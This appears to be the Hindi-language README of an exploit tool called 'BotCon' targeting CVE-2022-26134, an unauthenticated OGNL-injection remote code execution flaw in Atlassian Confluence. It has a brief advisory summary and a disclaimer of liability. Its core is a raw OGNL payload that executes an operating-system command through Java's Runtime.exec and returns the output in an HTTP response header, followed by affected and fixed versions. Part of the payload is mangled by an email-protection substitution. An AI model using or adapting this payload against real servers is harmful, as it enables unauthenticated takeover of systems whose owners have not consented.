BotCon
Attlasian Confluence बिना प्रमाणीकरण के OGNL इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन (CVE-2022-26134)
- 02 जून, 2022 को Atlassian ने अपने Confluence Server और Data Center अनुप्रयोगों के लिए एक सुरक्षा सलाह जारी की, जिसमें एक गंभीर स्तर की बिना प्रमाणीकरण वाली दूरस्थ कोड निष्पादन भेद्यता पर प्रकाश डाला गया। OGNL इंजेक्शन भेद्यता एक बिना प्रमाणीकृत उपयोगकर्ता को Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देती है।
इसे पढ़ें!
सावधानी से उपयोग करें। आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं
डेवलपर्स कोई दायित्व नहीं मानते हैं और किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

RAW Payload
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
बग विवरण
-
प्रभावित उत्पाद :
- Confluence
- Confluence Server
- Confluence Data Center
-
प्रभावित संस्करण :
- Confluence Server और Data Center के सभी समर्थित संस्करण प्रभावित हैं।
- 1.3.0 के बाद के Confluence Server और Data Center संस्करण प्रभावित हैं।
शमन (Mitigations)
- अपने Attlasian Confluence संस्करण को इन स्थिर संस्करणों में अपडेट करें :
- 7.4.17
- 7.13.7
- 7.14.3
- 7.15.2
- 7.16.4
- 7.17.4
- 7.18.1